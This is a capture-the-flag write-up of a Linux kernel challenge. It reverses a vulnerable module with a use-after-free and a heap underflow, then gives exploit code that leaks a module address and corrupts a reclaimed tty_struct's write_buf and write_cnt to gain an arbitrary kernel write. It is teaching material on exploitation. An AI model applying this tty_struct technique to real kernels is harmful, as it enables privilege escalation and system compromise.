Using tty_struct for arbitrary write
This is a writeup for the slots challenge, which was part of TFC 2025 CTF, that I played together with the Organizers.
The challenge is in the pwn category, and it was marked as a baby (=easy) challenge.
Initial analysis
Upon downloading and extracting the challenge files I saw that this was a Linux kernel challenge.
First it's always useful to check the (hopefully) included config
file to see what hardening options will make it more difficult to solve the challenge.
In this case we had the following config:
CONFIG_SLUB=y
CONFIG_SLAB_MERGE_DEFAULT=n
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_RANDOM_KMALLOC_CACHES=n
- We will use
SLUB
as the slab allocator - Slab caches are not merged, which could be used to heap overflow into objects of other similar caches if a merge were to happen
- The freelist order is randomized - allocations from the initial free list do not follow a sequential order, so object are not necessarily allocated directly after each other
- The pointers in the freelist are XORed with some random value and the address where they are stored at
- Random kmalloc caches are off - this would make multiple instances of a cache for a given size and pick one randomly at allocation
So we see some heap protection is enabled, why some other options are off.
Let's now look into the rootfs to see what we are working with.
We can first gunzip initramfs.cpio.gz
, and then cpio -iv < initramfs.cpio
to extract the contents.
Inside we see the init
file and also slot_machine.ko
, let's first check init
for how the system is setup, then we can start reversing the kernel module.
#!/bin/sh
export PS1='\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\w\[\033[00m\]\$ '
export LD_LIBRARY_PATH=/lib
chown -R root:root /
chmod 0700 /root
chown -R noob:noob /home/noob
mkdir -p /proc && mount -t proc none /proc
mkdir -p /dev && mount -t devtmpfs devtmpfs /dev
mkdir -p /tmp && mount -t tmpfs tmpfs /tmp
mkdir -p /sys && mount -t sysfs none /sys
mkdir -p /dev/pts && mount -t devpts /dev/ptmx /dev/pts
insmod slot_machine.ko
chmod 666 /dev/slot_machine
sysctl -w kernel.modprobe=""
sysctl -w kernel.core_pattern=""
echo 1 | tee /proc/sys/kernel/modules_disabled
echo 0 | tee /proc/sys/kernel/usermodehelper/bset
echo 0 | tee /proc/sys/kernel/usermodehelper/inheritable
echo "" | tee /sys/kernel/uevent_helper >/dev/null
rm flag
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
#grep 0x /sys/module/slot_machine/sections/.*
exec su -s /bin/sh - noob
#exec /bin/sh
poweroff -d 0 -f
Ignoring the commented lines I have added during the challenge for debugging, we see mostly regular instructions, and we also see the slot_machine.ko
module being loaded using insmod
.
One last important aspect, before we jump into reversing the kernel module, is to check the kernel command line options, begin passed by QEMU in run.sh
.
console=ttyS0 kpti fgkaslr quiet
- kpti - will unmap most of the kernel pages when we are executing in usermode.
- fgkaslr - is a stronger variant of kaslr in which a more finer grain approach is taken to ASLR in the kernel. Instead of rebasing the entire
.text
section, it will also randomize the location of functions contained within.
Reversing the module
First we look at init_module
to see how the given module is setup.
Most of the code I'll skip, since it's template character device setup, however note the following interesting piece of code:
fd_flag = filp_open("/flag",0,0);
if (fd_flag < 0xfffffffffffff001) {
while( true ) {
flag_size = uVar1;
__n = kernel_read(fd_flag,local_118,0xff,&local_120);
if ((long)__n < 1) break;
uVar1 = flag_size + __n;
if (0x400 < uVar1) {
filp_close(fd_flag,0);
return 0xfffffff4;
}
memcpy(&flag_data + flag_size,local_118,__n);
}
if (__n == 0) {
(&flag_data)[flag_size] = 0;
filp_close(fd_flag,0);
_printk(&DAT_00100820,"slot_machine");
fd_flag = 0;
}
else {
filp_close(fd_flag,0);
fd_flag = __n & 0xffffffff;
}
The module will read in the /flag
file and store the contents in an array in the .bss
section.
The only interesting function left to look at is the my_ioctl
function.
We can spot commands 0, 1, 3 and 1337.
Command 0 is going to make an allocation on the heap based on user input:
if (1 < chunk_allocated_times) {
return 0xffffffffffffffea;
}
lVar1 = _copy_from_user(&local_20,arg,8);
if (lVar1 != 0) {
return 0xfffffffffffffff2;
}
chunk = (void *)__kmalloc_noprof(local_20,0xcc0);
if (chunk == (void *)0x0) {
return 0xfffffffffffffff4;
}
chunk_allocated_times = chunk_allocated_times + 1;
chunk_size = local_20;
return 0;
The only argument from the user is the size of the allocation, which doesn't have a limit, as long as the allocation will succeed.
Also note, how chunk_allocated_times
is incremented at the end, and checked to be less than 1 at the start.
This means we are left with only a single heap allocation (unless we can overwrite this value). This makes heap grooming a bit more restricted since we can only have one custom-sized allocation.
Command 1 is going to free the allocation:
if (chunk == (void *)0x0) {
return 0;
}
kfree(chunk);
return 0;
You might notice a glaring issue already without even having looked at how the chunk is being used. After freeing the chunk, none of the associated variables (size or pointer) are nullified, therefore this opens up a use after free vulnerability.
Command 3 is going to copy input from userspace to the allocated kernel buffer:
lVar1 = _copy_from_user(&local_20,arg,0x18);
if (lVar1 != 0) {
return 0xfffffffffffffff2;
}
if ((chunk == (void *)0x0) || (chunk_size < local_20 + local_18)) {
return 0xffffffffffffffea;
}
if (0x7fffffff < local_18) goto LAB_trap;
lVar1 = _copy_from_user((void *)((long)chunk + local_20),local_10,(uint)local_18);
It's easier to understand if we go backwards from _copy_from_user
:
local_20
is the offset used into the heap chunklocal_10
is the user pointer to copy data fromlocal_18
is the amount of data to copy
The only checks are:
- We have heap allocation
- The offset plus the amount to copy is not above the chunk size
- The amount of data to copy is limited to
0x7fffffff
You might notice a slight issue in this case as well!
Although they check if the offset+length
would overflow the buffer, they don't check if it underflows.
More specifically it is possible to provide a negative offset in local_20
, but we have to compensate using the length - local_18
- because the size comparison is unsigned (using the JA
instruction).
This gives us a somewhat constrained, but generous relative write primitve on the heap. We will use this fact later in the exploitation phase as well.
Finally command 1337, allows the user to read data from the allocated heap chunk:
lVar1 = _copy_from_user(&local_20,arg,0x18);
if (lVar1 != 0) {
return 0xfffffffffffffff2;
}
if (chunk == (void *)0x0) {
return 0xffffffffffffffea;
}
if (chunk_size < local_20 + local_18) {
return 0xffffffffffffffea;
}
if (0x7fffffff < local_18) {
LAB_trap:
do {
invalidInstructionException();
} while( true );
}
lVar1 = _copy_to_user(local_10,(long)chunk + local_20,local_18);
Similarly to the previous command, we discover the same bugs and the same way to exploit them. Only this time it gives us a read primitive on the heap.
This concludes the reversing of the kernel module, and now we should move on to the exploitation phase.
Exploitation
Since our primitives are read/write on the heap and a use-after-free, but our flag is in the .bss
segment of the kernel module we need a way to achieve read in the kernel module.
And for such a primitive to be useful, we should also leak aa .bss
address from the kernel module somehow.
However a classical approach is hindered by the hardening flags in the config
we have visited already.
- A simple overwrite of a free pointer is tricky becuase of
CONFIG_SLAB_FREELIST_HARDENED
- Using the relative read/write primitives is also tricky because of
CONFIG_SLAB_FREELIST_RANDOM
, since an allocated structure will be at a random offset from the heap chunk where we are basing our primitive from.
Looking more around where our modules stores the chunk
pointer we can see other interesting heap addresses in the .bss
section for my_device
and my_class
.
We can use gdb
to inspect what is happening at these memory locations!
First add the -s -S
switches to the QEMU run command, then start qemu and attach to it with gdb using target remote :1234
.
We can also list the addresses of different sections of the kernel module using:
grep 0x /sys/module/slot_machine/sections/.*
Here we are interested in the .bss
section.
We can dump from .bss+0x420
, since that is where the chunk_allocated_times
variable is stored and after it we have bunch of interesting data.
As you can see, this is before any interaction with the module, thus chunk_allocated_times
is 0, just like chunk_size
and chunk
itself.
What is more important is to look at the next 2 pointers, my_device
and my_class
.
Both are pointing to a string, the name of the device.
But while my_device
points to a heap location containing the string, my_class
doesn't point to a heap address.
In fact if you check the address of the .rodata.str1.1
section, you will find it matches exactly with where the string is stored.
class_create
will take in the name of the device and return a class
struct as below:
struct class {
const char *name;
const struct attribute_group **class_groups;
const struct attribute_group **dev_groups;
int (*dev_uevent)(const struct device *dev, struct kobj_uevent_env *env);
char *(*devnode)(const struct device *dev, umode_t *mode);
void (*class_release)(const struct class *class);
void (*dev_release)(struct device *dev);
int (*shutdown_pre)(struct device *dev);
const struct kobj_ns_type_operations *ns_type;
const void *(*namespace)(const struct device *dev);
void (*get_ownership)(const struct device *dev, kuid_t *uid, kgid_t *gid);
const struct dev_pm_ops *pm;
};
So we see the first element of this struct is just a (const) pointer to the name. If we look at the implementation we can see that it just takes the name pointer it gets and stores it, without duplicating the string on the heap or anything similar:
struct class *class_create(const char *name)
{
struct class *cls;
int retval;
cls = kzalloc(sizeof(*cls), GFP_KERNEL);
if (!cls) {
retval = -ENOMEM;
goto error;
}
cls->name = name;
cls->class_release = class_create_release;
retval = class_register(cls);
if (retval)
goto error;
return cls;
error:
kfree(cls);
return ERR_PTR(retval);
}
This is good for us, since if we can leak this address from the heap, we can compute the .bss
address, and then at least we will know where the flag is stored.
Choosing the right size
Recall that since CONFIG_SLAB_FREELIST_RANDOM
is enabled, we don't have a guarantee that our allocation of the same size as a class
struct will end up after the struct of interest.
In general I have noticed by messing around with different sized allocations going into different caches, that some sizes, especially the larger ones, tend to get allocated after the struct in interest, while smaller allocations usually get allocated before the struct.
Since our read primitive is an underflow, it is critical that the struct to leak from resides at a lower address than our allocation. At the same time we must make sure that we are not too far away from it, otherwise we hit the limitation on the size of the operation, as discussed in the reversing section.
In my exploit I chose an allocation size of 1024, which should end up in kmalloc-1k
, which allocates after class
struct, reasonably often.
However there is another consideration with this size that is helpful for us.
This also happens to be the cache, where tty_struct
gets allocated to.
Indeed choosing the right size here is tricky, not only because of the random order, but because of the single allocation constraint of the challenge.
We can't simply use one allocation to leak an address and then use another one to perform a use-after-free, which we turn into an arbitrary read/write. Our single allocation has to work both for UAF and leaking purposes!
But remember, that the class
struct is still at a random offset before our allocation, so I wrote the following code to search for the address to leak:
uint64_t find_mod_leak(int fd) {
unsigned char resp[ALLOC_SIZE];
struct ctx_rw reading;
reading.buf = &read_buf[0];
for (long i = 0x100000; i < MAX_SEARCH; i += ALLOC_SIZE) {
reading.offset = -i;
reading.len = i + ALLOC_SIZE;
ioctl(fd, CMD_READ, &reading);
uint64_t* probe = (uint64_t*)&read_buf[0];
printf("offset: %ld\n", i);
for (int j = 0; j < ALLOC_SIZE/8 - 2; ++j) {
uint64_t cand = probe[j];
if ((cand & 0xfffffffff0000000) == 0xffffffffc0000000 &&
(cand & 0xfff) == 0x000 &&
probe[j+1] == 0 && probe[j+2] == 0) {
printf("found module string @ %p\n", cand);
return cand;
}
}
}
puts("failed to find str!\n");
}
It simply goes 8-bytes at a time backwards and checks the bits of the address not randomized by KASLR.
If we find an address, let's also check the next two 8-byte values, as we expect these to be 0 in the class
struct.
This is done to eliminate some false positives, which do not give the address of .rodata.str1.1
.
Now we can reconstruct the address of the flag as such:
uint64_t mod_leak = find_mod_leak(fd);
uint64_t bss_base = mod_leak - 0x1ac0;
uint64_t chunk_ptr_loc = bss_base + 0x430;
uint64_t flag_loc = bss_base + 0x20;
But there's still the issue that we need to read the flag somehow.
Reading out the flag
Now at least we know the address of the flag but how can we read it out?
It's not like we can use the current constrained heap read primitive, since we don't have the flag on the heap. Another option could be to find a struct which grants you arbitrary read if you can modify some field of it through UAF.
During the contest however, I didn't find such a struct, or the ones I found did not have an allocation size through which I was able to leak the flag's address.
Instead I opted to use tty_struct
, which is well known for it's ability to gain RIP control by overwriting the ops
field (or one of the op function pointers inside of it) and then triggering the call of the operation from userspace - such as using ioctl
.
However, here we are too far off of code execution.
We don't have any useful code pointers and even if we could leak some code pointer, fgkaslr
is here to cause pain.
Instead I opt to use tty_struct
for an arbitrary write, which is the main point of why I decided to post this writeup for this otherwise easy challenge.
I didn't find any public writeups utilizing tty_struct
for arbitrary write, and in general there are not too many posts focusing on this exact way to arbitrary write.
Many posts give write primitves that work by controlling a large part of a given struct, and then overlapping that struct with another chunk that contains some useful struct.
Nevertheless, I don't think this is a hidden/novel technique, just it's not super explicitly stated as far as I can tell, so here it is for future reference!
Looking at the tty_struct
the question is, what pointers does it have, and what can we gain by controlling them.
struct tty_struct {
struct kref kref;
int index;
struct device *dev;
struct tty_driver *driver;
struct tty_port *port;
const struct tty_operations *ops;
struct tty_ldisc *ldisc;
struct ld_semaphore ldisc_sem;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
struct ktermios termios, termios_locked;
char name[64];
unsigned long flags;
int count;
unsigned int receive_room;
struct winsize winsize;
struct {
spinlock_t lock;
bool stopped;
bool tco_stopped;
} flow;
struct {
struct pid *pgrp;
struct pid *session;
spinlock_t lock;
unsigned char pktstatus;
bool packet;
} ctrl;
bool hw_stopped;
bool closing;
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock;
int write_cnt;
u8 *write_buf;
struct list_head tty_files;
struct work_struct SAK_work;
} __randomize_layout;
There are many pointers to other structs, and of course ops
is quite well-known.
However write_buf
immediately sticks out as an interesting pointer.
Just based on it's name, if some sort of write happens to this buf, and we can control the pointer, then we can achieve arbitrary write.
If we track where the tty_write
function takes us, we will end up at:
static ssize_t file_tty_write(struct file *file, struct kiocb *iocb, struct iov_iter *from)
{
struct tty_struct *tty = file_tty(file);
struct tty_ldisc *ld;
ssize_t ret;
if (tty_paranoia_check(tty, file_inode(file), "tty_write"))
return -EIO;
if (!tty || !tty->ops->write || tty_io_error(tty))
return -EIO;
/* Short term debug to catch buggy drivers */
if (tty->ops->write_room == NULL)
tty_err(tty, "missing write_room method\n");
ld = tty_ldisc_ref_wait(tty);
if (!ld)
return hung_up_tty_write(iocb, from);
if (!ld->ops->write)
ret = -EIO;
else
ret = iterate_tty_write(ld, tty, file, from);
tty_ldisc_deref(ld);
return ret;
}
We see there's 2 ways to continue, besides the error cases.
hung_up_tty_write
will just lead to another error returned, and thus the only happy path is going through iterate_tty_write
.
If we check inside of this function, we start to see how write_buf
is going to be used:
// [...]
chunk = 2048;
if (test_bit(TTY_NO_WRITE_SPLIT, &tty->flags))
chunk = 65536;
if (count < chunk)
chunk = count;
/* write_buf/write_cnt is protected by the atomic_write_lock mutex */
if (tty->write_cnt < chunk) {
u8 *buf_chunk;
if (chunk < 1024)
chunk = 1024;
buf_chunk = kvmalloc(chunk, GFP_KERNEL | __GFP_RETRY_MAYFAIL);
if (!buf_chunk) {
ret = -ENOMEM;
goto out;
}
kvfree(tty->write_buf);
tty->write_cnt = chunk;
tty->write_buf = buf_chunk;
}
// [...]
Here we see that if we take the branch on tty->write_cnt < chunk
, then we will allocate a new buffer for the write_buf
, which will nuke the pointer we will carefully place there.
As such, it is important to also overwrite the write_cnt
field, such that it is at least as large as the chunk
variable of this function.
We see the default value is either 2048 or 65535 depending on the flags of the tty_struct
.
However ultimately it is the count
that determines the value of chunk
, which is taken from the iov_iter
that is initially passed to tty_write
.
Therefore our only job is to overwrite the write_buf
pointer and then also to make sure that the write_cnt
is large enough so we avoid nuking the pointer.
Afterwards the write to our buffer quickly happens without further restrictions:
/* Do the write .. */
for (;;) {
size_t size = min(chunk, count);
ret = -EFAULT;
if (copy_from_iter(tty->write_buf, size, from) != size)
break;
// [...]
The copy_from_iter
call will already copy the data we provided in userspace to the write_buf
.
And thus we have arbitrary write using tty_struct
by abusing a UAF on the write_buf
and write_cnt
fields.
Write What Where
Now that we have an arbitrary write primitive, it will still not get us the flag content by itself.
The approach here is simple, overwrite the chunk
pointer in the provided kernel module, such that it points to the flag, and then use the read ioctl
to get the flag content to userspace and then print it from there.
The exploit (after leaking necessary addresses) will free the 1024 chunk and allocate a tty_struct
in its place by opening /dev/ptmx
.
ioctl(fd, CMD_FREE, NULL);
int fd2 = open("/dev/ptmx", O_RDWR | O_NOCTTY);
Afterwards, we proceed to overwrite only the required fields (first we leak the entire struct, make changes, then overwrite the entire struct).
uint8_t tty_struct[1024];
struct ctx_rw reading;
reading.offset = 0;
reading.len = ALLOC_SIZE;
reading.buf = &tty_struct[0];
ioctl(fd, CMD_READ, &reading);
uint32_t* write_cnt = (uint32_t*)(&tty_struct[596]);
uint64_t* write_buf = (uint64_t*)(&tty_struct[600]);
// Ensure larger than chunk size so that we don't kmalloc a new buf
*write_cnt = 4096;
// Want to overwrite the chunk pointer
*write_buf = chunk_ptr_loc;
// Reuse same buffer + info for overwrite
ioctl(fd, CMD_WRITE, &reading);
Now a write to the tty device from user space will actually write to the chunk
pointer of the kernel module, so we overwrite it with the address of the flag:
char* data = (char*)&flag_loc;
write(fd2, data, sizeof(data));
At last, a read using the ioctl
of the kernel module will yield the flag:
// read modified pointer to the flag into the tty_struct
ioctl(fd, CMD_READ, &reading);
hexdump(&tty_struct[0], 1024);
printf("profit! %s\n", &tty_struct[0]);
fflush(stdout); // flush cause we will crash the kernel xd
Summary
To summarize this is a bit of an overkill solution to an otherwise easy challenge. After the CTF several players shared their solutions:
- There was one, which just creates a large enough allocation and hopes to leak the flag through the underflow. This is a perfectly valid solution and I did not think you can make the allocation be that close to the
.bss
section of the module. Perhaps they found some remains of the flag on the heap and tried to go near that. - The intended solution is to use the leak in this writeup, but then just use
tty_struct
, or another struct with RIP control to crash at the flag location. Because we see the kernel panic without any restrictions, you can leak the flag 8 bytes at a time by just pointing RIP at different offsets from the flag base.
Nevertheless I do think my approach is more general and can even avoid crashing the kernel and it also works with a hardened configuration which is more strict about the display of panic messages.
The crash we could recover from by restoring the original values of the write_buf
and write_cnt
fields, such that when we close the file descriptor and the tty_struct
is freed, it won't try to kfree
from the .bss
section.
The idea would be to leak the heap pointer of the struct (I think this should be possible), and then use the write ioctl
after the flag is read out to overwrite the chunk
pointer back to the heap.
Then we can again edit the fields of the tty_struct
to safe values.
I also like that this exploit is single-shot, whereas the intended solution requires running the exploit multiple times.
In any case the main takeaway from this post, should be the cool arbitrary write you can gain by controlling a tty_struct
.